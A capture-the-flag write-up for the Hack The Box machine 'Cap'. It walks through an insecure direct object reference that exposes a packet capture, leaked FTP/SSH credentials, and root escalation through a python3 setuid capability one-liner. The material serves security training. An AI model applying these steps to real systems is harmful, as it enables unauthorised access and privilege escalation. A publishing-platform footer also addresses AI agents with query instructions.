> For the complete documentation index, see [llms.txt](https://blog.verni.lol/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://blog.verni.lol/hack-the-box-write-ups/machines/cap.md).

# Cap

OS: Linux&#x20;

Difficulty: Easy

## Port Scanning

```
PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack vsftpd 3.0.3
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack gunicorn
```

#### checking out the website

![](https://user-images.githubusercontent.com/53917092/120903619-8acd6580-c61d-11eb-87c0-3faeb9725699.png)

Now we know that this site is used for network monitoring and that there is a user named Nathan.

Checking out "Security Snapshot"

![](https://user-images.githubusercontent.com/53917092/120903720-2b238a00-c61e-11eb-8ac9-de3df3a134dc.png)

This option redirects us to /data/1 where no traffic is logged. I changed it to /data/0 and here we see that there is some recorded traffic.

![](https://user-images.githubusercontent.com/53917092/120903730-3c6c9680-c61e-11eb-876e-d2e75b072f81.png)

I clicked to download and got a file called 0.pcap so I opened it with wireshark.

## User

![](https://user-images.githubusercontent.com/53917092/120903766-72aa1600-c61e-11eb-9f7a-8b7091209832.png)

In this file, we can see a lot of important information. We see that the user made http requests to the site. We see some TCP requests. But the main thing is that we see some FTP requests, where we can get Nathan's username and password on the FTP server.

Sorting the requests by protocol and navigating to the end of the file we find this information.

![](https://user-images.githubusercontent.com/53917092/120903978-d4b74b00-c61f-11eb-9156-488ad5edc8d3.png)

user: nathan&#x20;

password: Buck3tH4TF0RM3!

![](https://user-images.githubusercontent.com/53917092/120904027-3081d400-c620-11eb-98aa-a3050f5c64c8.png)

We can download the user flag running

> get user.txt

We can also use these credentials to log in in ssh.

> ssh nathan@\<box\_ip>

> password: Buck3tH4TF0RM3!

## Privesc

After some simple enumerations, I saw that the file /var/www/html/app.py had a line written "os.setuid(1000)". That led me to enumerate the binaries with capabilities to change their own uid to 0 (from root)

> getcap -r / 2>/dev/null

```
nathan@cap:~$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
```

We see that python3 is allowed to change its own uid. We can make a program that changes its uid and run a shell as root.

> python3 -c 'import os;os.setuid(0);os.system("bash")'

![](https://user-images.githubusercontent.com/53917092/120905497-c588cb00-c628-11eb-844a-11d9761b9458.png)

## Helpful links:

### Web

* [portswigger](https://portswigger.net/web-security/access-control/idor)
* [geeksforgeeks](https://www.geeksforgeeks.org/insecure-direct-object-reference-idor-vulnerability/)
* [owasp](https://cheatsheetseries.owasp.org/cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html)
* [hacktricks](https://book.hacktricks.xyz/pentesting-web/idor)

### User

* [hacktricks - wireshark](https://book.hacktricks.xyz/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks)
* [hacktricks - pentesting FTP](https://book.hacktricks.xyz/pentesting/pentesting-ftp)

### Privesc

* [hacktricks - linux privesc](https://book.hacktricks.xyz/linux-unix/privilege-escalation)
* [GTFOBins - python](https://gtfobins.github.io/gtfobins/python/)


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://blog.verni.lol/hack-the-box-write-ups/machines/cap.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
